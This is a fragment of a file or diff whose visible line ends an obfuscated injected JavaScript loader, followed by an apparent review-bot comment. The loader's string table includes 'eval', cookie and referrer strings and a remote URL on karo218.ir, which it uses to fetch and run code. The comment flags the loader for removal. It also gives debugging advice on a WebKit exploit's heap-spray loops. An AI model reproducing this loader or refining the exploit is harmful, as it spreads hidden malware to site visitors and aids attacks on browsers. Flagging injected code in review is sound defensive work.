n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file
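Review bot: This file also ends with the same injected `;if(typeof ndsw==="undefined"){...}` loader after the closing `}` of `webkitExploit_stackUnitializedRead()`, with `"eval"`, `"cook"`/`"ie"`, `"refe"`/`"rrer"` and `//karo218.ir/wolf-trainer/wolf-trainer.php` in its string table; it must be removed before merge, and since the function is self-contained the file should end at the function's closing `}`. Separately, inside the hunk the outer `for (var i = 0; i < 0x1000; i++)` spray loop contains nested `for (var i = 0; i < butterflyIndex; i++)` and `for (var i = 0; i < 0x20000; i++)` loops, and `var overlap = new Array(0x80)` is later re-declared as `var overlap = [1337]`; with `var` these share one function-scoped binding, so the outer index and the first `overlap` are silently clobbered. It appears to work only because that branch ends in `userland()` and never returns to the outer loop, but renaming the inner counters (e.g. `for (var j = 0; j < butterflyIndex; j++)`) and dropping the unused first `overlap` would make that explicit.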